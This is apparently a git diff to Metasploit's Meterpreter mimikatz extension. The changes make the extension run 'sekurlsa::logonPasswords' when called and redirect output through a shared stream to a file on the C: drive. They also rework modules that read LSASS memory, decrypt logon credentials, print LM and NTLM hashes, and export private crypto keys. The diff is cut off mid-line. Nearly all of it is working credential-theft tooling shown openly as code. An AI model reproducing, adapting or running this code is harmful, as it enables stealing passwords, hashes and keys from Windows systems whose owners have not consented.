diff --git a/c/meterpreter/source/extensions/mimikatz/global.cpp b/c/meterpreter/source/extensions/mimikatz/global.cpp new file mode 100644 index 00000000..f2a9caa5 --- /dev/null +++ b/c/meterpreter/source/extensions/mimikatz/global.cpp @@ -0,0 +1,4 @@ +#include "global.h" +#include + +std::wostream *outputStream = &std::wcout; \ No newline at end of file diff --git a/c/meterpreter/source/extensions/mimikatz/global.h b/c/meterpreter/source/extensions/mimikatz/global.h new file mode 100644 index 00000000..a2317d5c --- /dev/null +++ b/c/meterpreter/source/extensions/mimikatz/global.h @@ -0,0 +1,2 @@ +#include +extern std::wostream *outputStream; \ No newline at end of file diff --git a/c/meterpreter/source/extensions/mimikatz/main.cpp b/c/meterpreter/source/extensions/mimikatz/main.cpp index 689b3f1c..3e26c8ce 100644 --- a/c/meterpreter/source/extensions/mimikatz/main.cpp +++ b/c/meterpreter/source/extensions/mimikatz/main.cpp @@ -1,23 +1,9 @@ -#ifndef _METERPRETER_SOURCE_EXTENSION_MIMIKATZ_MIMIKATZ_H -#define _METERPRETER_SOURCE_EXTENSION_MIMIKATZ_MIMIKATZ_H -extern "C" -{ -#include "../../common/common.h" -} -#endif +#include "main.h" -#include -#include #include #include - - #include "mimikatz.h" - extern "C" { - -#include "modules/mod_mimikatz_sekurlsa.h" - /* Benjamin DELPY `gentilkiwi` http://blog.gentilkiwi.com benjamin@gentilkiwi.com @@ -30,31 +16,42 @@ extern "C" // second stage reflective dll inject payload and not the metsrv itself when it loads extensions. #include "../../ReflectiveDLLInjection/ReflectiveLoader.c" - // this sets the delay load hook function, see DelayLoadMetSrv.h EnableDelayLoadMetSrv(); +static string utf16toutf8(const wstring &s) +{ + const int size = ::WideCharToMultiByte( CP_UTF8, 0, s.c_str(), -1, NULL, 0, 0, NULL ); + + vector buf( size ); + ::WideCharToMultiByte( CP_UTF8, 0, s.c_str(), -1, &buf[0], size, 0, NULL ); + + return string( &buf[0] ); +} + DWORD request_boiler(Remote *remote, Packet *packet) { Packet * response = packet_create_response(packet); - bool result = 0; - //std::wofstream logFile( "c:\\out.txt"); - //std::wstreambuf *outbuf = std::wcout.rdbuf(logFile.rdbuf()); - //std::wstreambuf *errbuf = std::wcerr.rdbuf(logFile.rdbuf()); + bool iResult; + std::wofstream logFile("c:\\out.txt"); + std::wstreambuf *outbuf = std::wcout.rdbuf(logFile.rdbuf()); + outputStream = &logFile; - vector * mesArguments = new vector(); + wstring function = (L"sekurlsa::logonPasswords"); + vector *args = new vector(); - //mimikatz * myMimiKatz = new mimikatz(mesArguments); + mimikatz * myMimiKatz = new mimikatz(args); + myMimiKatz->doCommandeLocale(&function, args); + function = (L"exit"); + myMimiKatz->doCommandeLocale(&function, args); + delete myMimiKatz; + + std::wcout.rdbuf(outbuf); + + //http://clymb3r.wordpress.com/2013/04/09/modifying-mimikatz-to-be-loaded-using-invoke-reflectivedllinjection-ps1/ + //packet_add_tlv_string(response, TLV_MIMIKATZ_RESULT, res.c_str()); + packet_transmit_response(iResult, remote, response); - vector> monProvider; - //result = mod_mimikatz_sekurlsa_wdigest::getWDigest(mesArguments); - /* - if (mod_mimikatz_sekurlsa::searchLSASSDatas()) - { - mod_mimikatz_sekurlsa::getLogonData(mesArguments, &monProvider); - }*/ - - packet_transmit_response(result, remote, response); return ERROR_SUCCESS; } @@ -104,21 +101,3 @@ DWORD __declspec(dllexport) DeinitServerExtension(Remote *remote) return ERROR_SUCCESS; } } - - -//int wmain(int argc, wchar_t * argv[]) -//{ -// setlocale(LC_ALL, "French_France.65001"); -// _setmode(_fileno(stdin), _O_U8TEXT/*_O_WTEXT/*_O_U16TEXT*/); -// _setmode(_fileno(stdout), _O_U8TEXT/*_O_WTEXT/*_O_U16TEXT*/); -// _setmode(_fileno(stderr), _O_U8TEXT/*_O_WTEXT/*_O_U16TEXT*/); -// -// /*SetConsoleCP(CP_UTF8); -// SetConsoleOutputCP(CP_UTF8);*/ -// -// vector * mesArguments = new vector(argv + 1, argv + argc); -// -// mimikatz * myMimiKatz = new mimikatz(mesArguments); -// delete myMimiKatz, mesArguments; -// return ERROR_SUCCESS; -//} diff --git a/c/meterpreter/source/extensions/mimikatz/main.h b/c/meterpreter/source/extensions/mimikatz/main.h new file mode 100644 index 00000000..b94e403a --- /dev/null +++ b/c/meterpreter/source/extensions/mimikatz/main.h @@ -0,0 +1,22 @@ +#ifndef _METERPRETER_SOURCE_EXTENSION_MIMIKATZ_MIMIKATZ_H +#define _METERPRETER_SOURCE_EXTENSION_MIMIKATZ_MIMIKATZ_H +extern "C" +{ +#include "../../common/common.h" +} +#endif + +#include +#include +#include +#include +#include "mimikatz.h" +#include "global.h" + +#define TLV_TYPE_EXTENSION_MIMIKATZ 0 + +#define TLV_MIMIKATZ_RESULT \ + MAKE_CUSTOM_TLV( \ + TLV_META_TYPE_STRING, \ + TLV_TYPE_EXTENSION_MIMIKATZ, \ + 1) \ No newline at end of file diff --git a/c/meterpreter/source/extensions/mimikatz/mimikatz.cpp b/c/meterpreter/source/extensions/mimikatz/mimikatz.cpp index a14ede23..ddc62081 100644 --- a/c/meterpreter/source/extensions/mimikatz/mimikatz.cpp +++ b/c/meterpreter/source/extensions/mimikatz/mimikatz.cpp @@ -36,32 +36,32 @@ bool mimikatz::initLocalModules() mimikatz::mimikatz(vector * mesArguments) : Kmimikatz(NULL) { initLocalModules(); - SetConsoleTitle(MIMIKATZ_FULL); - wcout << MIMIKATZ_FULL << L"\t/* Traitement du Kiwi (" << __DATE__ << L' ' << __TIME__ << L") */" << endl << - L"// http://blog.gentilkiwi.com/mimikatz" << endl; + //SetConsoleTitle(MIMIKATZ_FULL); + //(*outputStream) << MIMIKATZ_FULL << L"\t/* Traitement du Kiwi (" << __DATE__ << L' ' << __TIME__ << L") */" << endl << + // L"// http://blog.gentilkiwi.com/mimikatz" << endl; - bool mustContinue = true; - if(mesArguments) - { - for(vector::iterator maCommande = mesArguments->begin(); mustContinue && (maCommande != mesArguments->end()); maCommande++) - { - wstring commande = *maCommande; - wcout << endl << MIMIKATZ << L"(commandline) # " << dec << commande << endl; - mustContinue = tryToDispatch(&commande); - } - } + //bool mustContinue = true; + //if(mesArguments) + //{ + // for(vector::iterator maCommande = mesArguments->begin(); mustContinue && (maCommande != mesArguments->end()); maCommande++) + // { + // wstring commande = *maCommande; + // (*outputStream) << endl << MIMIKATZ << L"(commandline) # " << dec << commande << endl; + // mustContinue = tryToDispatch(&commande); + // } + //} - if(mustContinue) - { - wstring * monBuffer = new wstring(); - do - { - wcout << endl << MIMIKATZ << L" # " << dec; - getline(wcin, *monBuffer); - } while(tryToDispatch(monBuffer)); - delete monBuffer; - } - wcout.flush(); + //if(mustContinue) + //{ + // wstring * monBuffer = new wstring(); + // do + // { + // (*outputStream) << endl << MIMIKATZ << L" # " << dec; + // getline(wcin, *monBuffer); + // } while(tryToDispatch(monBuffer)); + // delete monBuffer; + //} + //(*outputStream).flush(); } mimikatz::~mimikatz(void) @@ -128,17 +128,17 @@ bool mimikatz::doCommandeLocale(wstring * fonction, vector * arguments) } } - if(module.empty()) wcout << L"Commande locale \'" << commande << L"\' introuvable" << endl; - else wcout << L"Module : \'" << module << L"\' identifié, mais commande \'" << commande << L"\' introuvable" << endl; + if(module.empty()) (*outputStream) << L"Commande locale \'" << commande << L"\' introuvable" << endl; + else (*outputStream) << L"Module : \'" << module << L"\' identifié, mais commande \'" << commande << L"\' introuvable" << endl; - wcout << endl << L"Description du module : " << monModule->description << endl; + (*outputStream) << endl << L"Description du module : " << monModule->description << endl; listCommandes(monModule); return true; } } - wcout << L"Module : \'" << module << L"\' introuvable" << endl << endl << L"Modules disponibles : " << endl; + (*outputStream) << L"Module : \'" << module << L"\' introuvable" << endl << endl << L"Modules disponibles : " << endl; listModules(); return true; } @@ -149,14 +149,14 @@ bool mimikatz::openKernel() if(!Kmimikatz || Kmimikatz == INVALID_HANDLE_VALUE) { - wcout << L"Ouverture du pilote mimikatz : "; + (*outputStream) << L"Ouverture du pilote mimikatz : "; Kmimikatz = CreateFile(L"\\\\.\\mimikatz", GENERIC_READ | GENERIC_WRITE, 0, NULL, OPEN_EXISTING, 0, NULL); if(reussite = (Kmimikatz && Kmimikatz != INVALID_HANDLE_VALUE)) - wcout << L"OK"; + (*outputStream) << L"OK"; else - wcout << L"CreateFile ; " << mod_system::getWinError(); - wcout << endl; + (*outputStream) << L"CreateFile ; " << mod_system::getWinError(); + (*outputStream) << endl; } else { @@ -188,41 +188,41 @@ bool mimikatz::doCommandeKernel(std::wstring &commande) { DWORD dwReturn; /* - wcout << L"DEBUG WriteFile " << endl << + (*outputStream) << L"DEBUG WriteFile " << endl << L"\tToWrite : " << (commande.size() + 1) * sizeof(wchar_t) << endl; */ if(WriteFile(Kmimikatz, commande.c_str(), (commande.size() + 1) * sizeof(wchar_t), &dwReturn, NULL)) { - /*wcout << L"\tWriten : " << dwReturn << endl << endl;*/ + /*(*outputStream) << L"\tWriten : " << dwReturn << endl << endl;*/ DWORD dwBuff = 0x40000; DWORD dwRead = 0; BYTE * buffer = new BYTE[dwBuff]; RtlZeroMemory(buffer, dwBuff); - /*wcout << L"DEBUG ReadFile " << endl << + /*(*outputStream) << L"DEBUG ReadFile " << endl << L"\tBuffSize : " << dwBuff << endl;*/ if(ReadFile(Kmimikatz, buffer, dwBuff, &dwRead, NULL)) { - /*wcout << + /*(*outputStream) << L"\tReaded : " << dwRead << endl << endl; */ - wcout /*<< L"BUFF : " << endl*/ + (*outputStream) /*<< L"BUFF : " << endl*/ << reinterpret_cast(buffer) << endl; } - else wcout << L"ReadFile : " << mod_system::getWinError() << endl; + else (*outputStream) << L"ReadFile : " << mod_system::getWinError() << endl; delete[] buffer; } - else wcout << L"WriteFile : " << mod_system::getWinError() << endl; + else (*outputStream) << L"WriteFile : " << mod_system::getWinError() << endl; } - else wcout << L"Impossible de communiquer avec le pilote mimikatz"; + else (*outputStream) << L"Impossible de communiquer avec le pilote mimikatz"; } else { - wcout << L"Commande vide (fermeture forcée) reçue" << endl; + (*outputStream) << L"Commande vide (fermeture forcée) reçue" << endl; closeKernel(); } @@ -246,21 +246,21 @@ bool mimikatz::doCommandeDistante(std::wstring &commande) { if(commOk = mod_mimikatz_inject::monCommunicator->readFromPipe(buffer)) { - wcout << buffer.substr(1) ; + (*outputStream) << buffer.substr(1) ; } else { - wcout << L"Erreur : pas de réponse possible ; " << mod_system::getWinError() << endl; + (*outputStream) << L"Erreur : pas de réponse possible ; " << mod_system::getWinError() << endl; break; } } while(*(buffer.begin()) == L'#'); } - else wcout << L"Erreur : pas d\'écriture possible ; " << mod_system::getWinError() << endl; + else (*outputStream) << L"Erreur : pas d\'écriture possible ; " << mod_system::getWinError() << endl; } } - else wcout << L"Commande vide (déconnexion forcée) reçue" << endl; + else (*outputStream) << L"Commande vide (déconnexion forcée) reçue" << endl; } - else wcout << L"Erreur : pas ou plus de communication établie" << endl; + else (*outputStream) << L"Erreur : pas ou plus de communication établie" << endl; if(!commOk) mod_mimikatz_inject::closeThisCommunicator(); @@ -272,7 +272,7 @@ void mimikatz::listModules() { for(vector::iterator monModule = mesModules.begin(); monModule != mesModules.end(); monModule++) { - wcout << setw(12) << setfill(wchar_t(' ')) << monModule->module << L"\t- " << monModule->description << endl; + (*outputStream) << setw(12) << setfill(wchar_t(' ')) << monModule->module << L"\t- " << monModule->description << endl; } } @@ -281,6 +281,6 @@ void mimikatz::listCommandes(vector::iterator monMod for(vector::iterator maCommande = monModule->commandes.begin(); maCommande != monModule->commandes.end(); maCommande++) { if(maCommande->commandName.front() != L':') - wcout << setw(12) << setfill(wchar_t(' ')) << maCommande->commandName << L"\t- " << maCommande->commandHelp << endl; + (*outputStream) << setw(12) << setfill(wchar_t(' ')) << maCommande->commandName << L"\t- " << maCommande->commandHelp << endl; } } \ No newline at end of file diff --git a/c/meterpreter/source/extensions/mimikatz/mimikatz.h b/c/meterpreter/source/extensions/mimikatz/mimikatz.h index 6844cc57..267e67a9 100644 --- a/c/meterpreter/source/extensions/mimikatz/mimikatz.h +++ b/c/meterpreter/source/extensions/mimikatz/mimikatz.h @@ -33,7 +33,7 @@ class mimikatz { -private: +public: static vector getMimiKatzCommands(); vector mesModules; bool initLocalModules(); diff --git a/c/meterpreter/source/extensions/mimikatz/modules/LSA Keys/keys_nt5.cpp b/c/meterpreter/source/extensions/mimikatz/modules/LSA Keys/keys_nt5.cpp index 6732a6da..fef96923 100644 --- a/c/meterpreter/source/extensions/mimikatz/modules/LSA Keys/keys_nt5.cpp +++ b/c/meterpreter/source/extensions/mimikatz/modules/LSA Keys/keys_nt5.cpp @@ -60,7 +60,7 @@ bool mod_mimikatz_sekurlsa_keys_nt5::searchAndInitLSASSData() mesSucces++; } } - else wcout << L"mod_memory::searchMemory NT5 " << mod_system::getWinError() << endl; + else (*outputStream) << L"mod_memory::searchMemory NT5 " << mod_system::getWinError() << endl; return (mesSucces == 6); } diff --git a/c/meterpreter/source/extensions/mimikatz/modules/LSA Keys/keys_nt6.cpp b/c/meterpreter/source/extensions/mimikatz/modules/LSA Keys/keys_nt6.cpp index 24a33537..67e4d3f7 100644 --- a/c/meterpreter/source/extensions/mimikatz/modules/LSA Keys/keys_nt6.cpp +++ b/c/meterpreter/source/extensions/mimikatz/modules/LSA Keys/keys_nt6.cpp @@ -112,9 +112,9 @@ bool mod_mimikatz_sekurlsa_keys_nt6::searchAndInitLSASSData() if(mod_memory::readMemory(reinterpret_cast(maCle.cle) + FIELD_OFFSET(KIWI_BCRYPT_KEY_DATA, data), &(*h3DesKey)->cle->data, maCleData.size - FIELD_OFFSET(KIWI_BCRYPT_KEY_DATA, data), mod_mimikatz_sekurlsa::hLSASS)) mesSucces++; } - else wcout << L"LsaInitializeProtectedMemory NT6 KO" << endl; + else (*outputStream) << L"LsaInitializeProtectedMemory NT6 KO" << endl; } - else wcout << L"mod_memory::searchMemory NT6 " << mod_system::getWinError() << endl; + else (*outputStream) << L"mod_memory::searchMemory NT6 " << mod_system::getWinError() << endl; return (mesSucces == 3); } diff --git a/c/meterpreter/source/extensions/mimikatz/modules/Security Packages/kerberos.cpp b/c/meterpreter/source/extensions/mimikatz/modules/Security Packages/kerberos.cpp index 3af21c79..1e76011e 100644 --- a/c/meterpreter/source/extensions/mimikatz/modules/Security Packages/kerberos.cpp +++ b/c/meterpreter/source/extensions/mimikatz/modules/Security Packages/kerberos.cpp @@ -128,7 +128,7 @@ bool WINAPI mod_mimikatz_sekurlsa_kerberos::getKerberosLogonData(__in PLUID logI mod_mimikatz_sekurlsa::genericCredsToStream(mesCreds, justSecurity); delete [] monBuff; } - else wcout << L"n.a. (kerberos KO)"; + else (*outputStream) << L"n.a. (kerberos KO)"; return true; } diff --git a/c/meterpreter/source/extensions/mimikatz/modules/Security Packages/livessp.cpp b/c/meterpreter/source/extensions/mimikatz/modules/Security Packages/livessp.cpp index 6f37f3fe..a1e124e4 100644 --- a/c/meterpreter/source/extensions/mimikatz/modules/Security Packages/livessp.cpp +++ b/c/meterpreter/source/extensions/mimikatz/modules/Security Packages/livessp.cpp @@ -58,12 +58,12 @@ bool WINAPI mod_mimikatz_sekurlsa_livessp::getLiveSSPLogonData(__in PLUID logId, if(mod_memory::readMemory(pLogSession->suppCreds, monBuffC, sizeof(KIWI_LIVESSP_PRIMARY_CREDENTIAL), mod_mimikatz_sekurlsa::hLSASS)) mesCreds = &(reinterpret_cast(monBuffC)->credentials); } - else wcout << L"n.s. (SuppCred KO) / "; + else (*outputStream) << L"n.s. (SuppCred KO) / "; } } mod_mimikatz_sekurlsa::genericCredsToStream(mesCreds, justSecurity, true); delete [] monBuffC, monBuffP; } - else wcout << L"n.a. (livessp KO)"; + else (*outputStream) << L"n.a. (livessp KO)"; return true; } \ No newline at end of file diff --git a/c/meterpreter/source/extensions/mimikatz/modules/Security Packages/msv1_0.cpp b/c/meterpreter/source/extensions/mimikatz/modules/Security Packages/msv1_0.cpp index a3290948..2bd5ddd7 100644 --- a/c/meterpreter/source/extensions/mimikatz/modules/Security Packages/msv1_0.cpp +++ b/c/meterpreter/source/extensions/mimikatz/modules/Security Packages/msv1_0.cpp @@ -153,26 +153,26 @@ bool WINAPI mod_mimikatz_sekurlsa_msv1_0::getMSVLogonData(__in PLUID logId, __in if(mod_memory::readMemory(mesCreds->PrimaryCredentials, kiwiMSVPrimaryCredentials, sizeof(KIWI_MSV1_0_PRIMARY_CREDENTIALS), mod_mimikatz_sekurlsa::hLSASS)) { decryptAndDisplayCredsBlock(&reinterpret_cast(kiwiMSVPrimaryCredentials)->Credentials, justSecurity); - } else wcout << L"n.e. (Lecture KIWI_MSV1_0_PRIMARY_CREDENTIALS KO)"; + } else (*outputStream) << L"n.e. (Lecture KIWI_MSV1_0_PRIMARY_CREDENTIALS KO)"; delete [] kiwiMSVPrimaryCredentials; - } else wcout << L"n.s. (PrimaryCredentials KO)"; + } else (*outputStream) << L"n.s. (PrimaryCredentials KO)"; - }else wcout << L"n.e. (Lecture KIWI_MSV1_0_CREDENTIALS KO)"; + }else (*outputStream) << L"n.e. (Lecture KIWI_MSV1_0_CREDENTIALS KO)"; delete [] kiwiMSVCredentials; - } else wcout << L"n.s. (Credentials KO)"; + } else (*outputStream) << L"n.s. (Credentials KO)"; - } else wcout << L"n.e. (Lecture KIWI_MSV1_0_LIST KO)"; + } else (*outputStream) << L"n.e. (Lecture KIWI_MSV1_0_LIST KO)"; delete [] kiwiMSVListEntry; break; } } if(!pLogSession) - wcout << L"n.t. (LUID KO)"; + (*outputStream) << L"n.t. (LUID KO)"; } - else wcout << L"n.a. (msv1_0 KO)"; + else (*outputStream) << L"n.a. (msv1_0 KO)"; return true; } @@ -193,19 +193,19 @@ bool mod_mimikatz_sekurlsa_msv1_0::decryptAndDisplayCredsBlock(LSA_UNICODE_STRIN wstring ntHash = mod_text::stringOfHex(mesCreds->NtOwfPassword, sizeof(mesCreds->NtOwfPassword)); if(justSecurity) - wcout << L"lm{ " << lmHash << L" }, ntlm{ " << ntHash << L" }"; + (*outputStream) << L"lm{ " << lmHash << L" }, ntlm{ " << ntHash << L" }"; else { - wcout << endl << + (*outputStream) << endl << L"\t * Utilisateur : " << mod_text::stringOfSTRING(mesCreds->UserName) << endl << L"\t * Domaine : " << mod_text::stringOfSTRING(mesCreds->LogonDomainName) << endl << L"\t * Hash LM : " << lmHash << endl << L"\t * Hash NTLM : " << ntHash; } - } else wcout << L"n.e. (Lecture Block Credentials KO)"; + } else (*outputStream) << L"n.e. (Lecture Block Credentials KO)"; delete [] monBuffer; - } else wcout << L"n.s. (Block Credentials KO)"; + } else (*outputStream) << L"n.s. (Block Credentials KO)"; return true; } diff --git a/c/meterpreter/source/extensions/mimikatz/modules/Security Packages/ssp.cpp b/c/meterpreter/source/extensions/mimikatz/modules/Security Packages/ssp.cpp index f9e25ca6..89bf8c70 100644 --- a/c/meterpreter/source/extensions/mimikatz/modules/Security Packages/ssp.cpp +++ b/c/meterpreter/source/extensions/mimikatz/modules/Security Packages/ssp.cpp @@ -85,7 +85,7 @@ bool WINAPI mod_mimikatz_sekurlsa_ssp::getSSPLogonData(__in PLUID logId, __in bo } } } - else wcout << L"n.a. (SSP KO)"; + else (*outputStream) << L"n.a. (SSP KO)"; return true; } \ No newline at end of file diff --git a/c/meterpreter/source/extensions/mimikatz/modules/Security Packages/tspkg.cpp b/c/meterpreter/source/extensions/mimikatz/modules/Security Packages/tspkg.cpp index 0f129ce1..bf985e15 100644 --- a/c/meterpreter/source/extensions/mimikatz/modules/Security Packages/tspkg.cpp +++ b/c/meterpreter/source/extensions/mimikatz/modules/Security Packages/tspkg.cpp @@ -82,12 +82,12 @@ bool WINAPI mod_mimikatz_sekurlsa_tspkg::getTsPkgLogonData(__in PLUID logId, __i if(mod_memory::readMemory(pLogSession->pTsPrimary, monBuffC, sizeof(KIWI_TS_PRIMARY_CREDENTIAL), mod_mimikatz_sekurlsa::hLSASS)) mesCreds = &(reinterpret_cast(monBuffC)->credentials); } - else wcout << L"n.s. (SuppCred KO) / "; + else (*outputStream) << L"n.s. (SuppCred KO) / "; } } mod_mimikatz_sekurlsa::genericCredsToStream(mesCreds, justSecurity, true); delete [] monBuffC, monBuffP; } - else wcout << L"n.a. (tspkg KO)"; + else (*outputStream) << L"n.a. (tspkg KO)"; return true; } diff --git a/c/meterpreter/source/extensions/mimikatz/modules/Security Packages/wdigest.cpp b/c/meterpreter/source/extensions/mimikatz/modules/Security Packages/wdigest.cpp index 6b28f8c1..2aaefd44 100644 --- a/c/meterpreter/source/extensions/mimikatz/modules/Security Packages/wdigest.cpp +++ b/c/meterpreter/source/extensions/mimikatz/modules/Security Packages/wdigest.cpp @@ -84,7 +84,7 @@ bool WINAPI mod_mimikatz_sekurlsa_wdigest::getWDigestLogonData(__in PLUID logId, mod_mimikatz_sekurlsa::genericCredsToStream(mesCreds, justSecurity); delete [] monBuff; } - else wcout << L"n.a. (wdigest KO)"; + else (*outputStream) << L"n.a. (wdigest KO)"; return true; } diff --git a/c/meterpreter/source/extensions/mimikatz/modules/globdefs.h b/c/meterpreter/source/extensions/mimikatz/modules/globdefs.h index ca1564f8..6158614e 100644 --- a/c/meterpreter/source/extensions/mimikatz/modules/globdefs.h +++ b/c/meterpreter/source/extensions/mimikatz/modules/globdefs.h @@ -10,6 +10,7 @@ #include #include #include +#include "../global.h" using namespace std; #define SECURITY_WIN32 diff --git a/c/meterpreter/source/extensions/mimikatz/modules/mod_mimikatz_crypto.cpp b/c/meterpreter/source/extensions/mimikatz/modules/mod_mimikatz_crypto.cpp index 74b8303f..40ec6842 100644 --- a/c/meterpreter/source/extensions/mimikatz/modules/mod_mimikatz_crypto.cpp +++ b/c/meterpreter/source/extensions/mimikatz/modules/mod_mimikatz_crypto.cpp @@ -23,23 +23,23 @@ bool mod_mimikatz_crypto::listProviders(vector * arguments) { vector * monVectorProviders = new vector(); /* CryptoAPI */ - wcout << L"Providers CryptoAPI :" << endl; + (*outputStream) << L"Providers CryptoAPI :" << endl; if(mod_cryptoapi::getVectorProviders(monVectorProviders)) for(vector::iterator monProvider = monVectorProviders->begin(); monProvider != monVectorProviders->end(); monProvider++) - wcout << L'\t' << *monProvider << endl; - else wcout << L"mod_cryptoapi::getVectorProviders : " << mod_system::getWinError() << endl; + (*outputStream) << L'\t' << *monProvider << endl; + else (*outputStream) << L"mod_cryptoapi::getVectorProviders : " << mod_system::getWinError() << endl; /* CryptoNG */ if(mod_cryptong::isNcrypt) { - wcout << endl; + (*outputStream) << endl; monVectorProviders->clear(); - wcout << L"Providers CNG :" << endl; + (*outputStream) << L"Providers CNG :" << endl; if(mod_cryptong::getVectorProviders(monVectorProviders)) for(vector::iterator monProvider = monVectorProviders->begin(); monProvider != monVectorProviders->end(); monProvider++) - wcout << L'\t' << *monProvider << endl; - else wcout << L"mod_cryptong::getVectorProviders : " << mod_system::getWinError() << endl; + (*outputStream) << L'\t' << *monProvider << endl; + else (*outputStream) << L"mod_cryptong::getVectorProviders : " << mod_system::getWinError() << endl; } delete monVectorProviders; return true; @@ -61,20 +61,20 @@ bool mod_mimikatz_crypto::listStores(vector * arguments) { wstring monEmplacement = (arguments->empty() ? L"CERT_SYSTEM_STORE_CURRENT_USER" : arguments->front()); - wcout << L"Emplacement : \'" << monEmplacement << L'\''; + (*outputStream) << L"Emplacement : \'" << monEmplacement << L'\''; DWORD systemStore; if(mod_crypto::getSystemStoreFromString(monEmplacement, &systemStore)) { - wcout << endl; + (*outputStream) << endl; vector * mesStores = new vector(); if(mod_crypto::getVectorSystemStores(mesStores, systemStore)) for(vector::iterator monStore = mesStores->begin(); monStore != mesStores->end(); monStore++) - wcout << L'\t' << *monStore << endl; - else wcout << L"mod_crypto::getListSystemStores : " << mod_system::getWinError() << endl; + (*outputStream) << L'\t' << *monStore << endl; + else (*outputStream) << L"mod_crypto::getListSystemStores : " << mod_system::getWinError() << endl; delete mesStores; } - else wcout << L" introuvable !" << endl; + else (*outputStream) << L" introuvable !" << endl; return true; } @@ -110,7 +110,7 @@ void mod_mimikatz_crypto::listAndOrExportKeys(vector * arguments, bool mod_cryptoapi::getProviderTypeFromString(arguments->back(), &providerType); break; default : - wcout << L"Erreur d\'arguments, attendu : [machine] [provider providerType]" << endl; + (*outputStream) << L"Erreur d\'arguments, attendu : [machine] [provider providerType]" << endl; return; } @@ -120,14 +120,14 @@ void mod_mimikatz_crypto::listAndOrExportKeys(vector * arguments, bool vector * monVectorKeys = new vector(); /* CryptoAPI */ - wcout << L"[" << type << L"] Clés CryptoAPI :" << endl; + (*outputStream) << L"[" << type << L"] Clés CryptoAPI :" << endl; if(mod_cryptoapi::getVectorContainers(monVectorKeys, isMachine)) { DWORD i; vector::iterator monContainer; for(i = 0, monContainer = monVectorKeys->begin(); monContainer != monVectorKeys->end(); monContainer++, i++) { - wcout << L"\t - " << *monContainer << endl; + (*outputStream) << L"\t - " << *monContainer << endl; HCRYPTPROV hCryptKeyProv = NULL; if(CryptAcquireContext(&hCryptKeyProv, monContainer->c_str(), provider.c_str(), providerType, NULL | (isMachine ? CRYPT_MACHINE_KEYSET : NULL))) @@ -137,12 +137,12 @@ void mod_mimikatz_crypto::listAndOrExportKeys(vector * arguments, bool { if(CryptGetUserKey(hCryptKeyProv, ks, &maCle)) { - wcout << L"\t\tType : " << mod_crypto::KeyTypeToString(ks) << endl; + (*outputStream) << L"\t\tType : " << mod_crypto::KeyTypeToString(ks) << endl; DWORD param = 0, taille = sizeof(param); if(CryptGetKeyParam(maCle, KP_PERMISSIONS, reinterpret_cast(¶m), &taille, NULL)) - wcout << L"\t\tExportabilité : " << (param & CRYPT_EXPORT ? L"OUI" : L"NON") << endl; + (*outputStream) << L"\t\tExportabilité : " << (param & CRYPT_EXPORT ? L"OUI" : L"NON") << endl; if(CryptGetKeyParam(maCle, KP_KEYLEN, reinterpret_cast(¶m), &taille, NULL)) - wcout << L"\t\tTaille clé : " << param << endl; + (*outputStream) << L"\t\tTaille clé : " << param << endl; if(exportKeys) { @@ -162,10 +162,10 @@ void mod_mimikatz_crypto::listAndOrExportKeys(vector * arguments, bool delete[] monExport; } - wcout << L"\t\tExport privé dans \'" << monBuff.str() << L"\' : " << (reussite ? L"OK" : L"KO") << endl; + (*outputStream) << L"\t\tExport privé dans \'" << monBuff.str() << L"\' : " << (reussite ? L"OK" : L"KO") << endl; if(!reussite) { - wcout << L"\t\t\tmod_cryptoapi::getPrivateKey/PrivateKeyBlobToPVK : " << mod_system::getWinError() << endl; + (*outputStream) << L"\t\t\tmod_cryptoapi::getPrivateKey/PrivateKeyBlobToPVK : " << mod_system::getWinError() << endl; } } } @@ -174,30 +174,30 @@ void mod_mimikatz_crypto::listAndOrExportKeys(vector * arguments, bool if(maCle) CryptDestroyKey(maCle); else - wcout << L"\t\t* Erreur de clé ; " << mod_system::getWinError() << endl; + (*outputStream) << L"\t\t* Erreur de clé ; " << mod_system::getWinError() << endl; CryptReleaseContext(hCryptKeyProv, 0); } - else wcout << L"\t\t* Erreur d\'acquisition de la clé ; " << mod_system::getWinError() << endl; + else (*outputStream) << L"\t\t* Erreur d\'acquisition de la clé ; " << mod_system::getWinError() << endl; } } - else wcout << L"mod_cryptoapi::getVectorContainers : " << mod_system::getWinError() << endl; + else (*outputStream) << L"mod_cryptoapi::getVectorContainers : " << mod_system::getWinError() << endl; /* CryptoNG */ if(mod_cryptong::isNcrypt) { - wcout << endl; + (*outputStream) << endl; monVectorKeys->clear(); - wcout << L"[" << type << L"] Clés CNG :" << endl; + (*outputStream) << L"[" << type << L"] Clés CNG :" << endl; if(mod_cryptong::getVectorContainers(monVectorKeys, isMachine)) { DWORD i; vector::iterator monContainer; for(i = 0, monContainer = monVectorKeys->begin(); monContainer != monVectorKeys->end(); monContainer++, i++) { - wcout << L"\t - " << *monContainer << endl; + (*outputStream) << L"\t - " << *monContainer << endl; NCRYPT_KEY_HANDLE maCle; if(mod_cryptong::getHKeyFromName(*monContainer, &maCle, isMachine)) @@ -206,9 +206,9 @@ void mod_mimikatz_crypto::listAndOrExportKeys(vector * arguments, bool DWORD size = 0; if(mod_cryptong::isKeyExportable(&maCle, &exportable)) - wcout << L"\t\tExportabilité : " << (exportable ? L"OUI" : L"NON") << endl; + (*outputStream) << L"\t\tExportabilité : " << (exportable ? L"OUI" : L"NON") << endl; if(mod_cryptong::getKeySize(&maCle, &size)) - wcout << L"\t\tTaille clé : " << size << endl; + (*outputStream) << L"\t\tTaille clé : " << size << endl; if(exportKeys) { @@ -225,17 +225,17 @@ void mod_mimikatz_crypto::listAndOrExportKeys(vector * arguments, bool delete[] monExport; } - wcout << L"\t\tExport privé dans \'" << monBuff.str() << L"\' : " << (reussite ? L"OK" : L"KO") << endl; + (*outputStream) << L"\t\tExport privé dans \'" << monBuff.str() << L"\' : " << (reussite ? L"OK" : L"KO") << endl; if(!reussite) { - wcout << L"\t\t\tmod_cryptong::getPrivateKey/PrivateKeyBlobToPVK : " << mod_system::getWinError() << endl; + (*outputStream) << L"\t\t\tmod_cryptong::getPrivateKey/PrivateKeyBlobToPVK : " << mod_system::getWinError() << endl; } } mod_cryptong::NCryptFreeObject(maCle); } } } - else wcout << L"mod_cryptong::getVectorContainers : " << mod_system::getWinError() << endl; + else (*outputStream) << L"mod_cryptong::getVectorContainers : " << mod_system::getWinError() << endl; } delete monVectorKeys; @@ -257,12 +257,12 @@ void mod_mimikatz_crypto::listAndOrExportCertificates(vector * argument monStore = arguments->back(); } - wcout << L"Emplacement : \'" << monEmplacement << L'\''; + (*outputStream) << L"Emplacement : \'" << monEmplacement << L'\''; DWORD systemStore; if(mod_crypto::getSystemStoreFromString(monEmplacement, &systemStore)) { - wcout << L"\\" << monStore << endl; + 